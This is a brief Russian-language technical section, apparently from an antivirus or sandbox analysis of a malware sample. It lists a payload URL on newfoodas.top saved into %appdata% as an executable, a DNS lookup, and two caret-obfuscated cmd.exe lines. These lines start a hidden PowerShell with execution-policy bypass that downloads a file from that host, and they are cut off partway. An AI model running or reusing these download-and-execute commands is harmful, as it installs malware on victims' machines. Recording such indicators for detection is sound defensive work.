Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^E^rS^hELl^.eXE^ -^E^X^e^CUt^ION^polIc^Y^ bYPasS^ -N^oP^ro^fiLE -^wI^N^do^wstyl^e ^hi^dd^En (^NEW-OB^JE^cT^ sySTem.NEt.wE^B^ClIeN^T)^.^D^OW^Nl^o^a^DFILe('http://newfoodas.t...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "po^w^E^rS^hELl^.eXE^ -^E^X^e^CUt^ION^polIc^Y^ bYPasS^ -N^oP^ro^fiLE -^wI^N^do^wstyl^e ^hi^dd^En (^NEW-OB^JE^cT^ sySTem.NEt.wE^B^ClIeN^T)^.^D^OW^Nl^o^a^DFILe('http://newfoodas.t...' (со скрытым окном)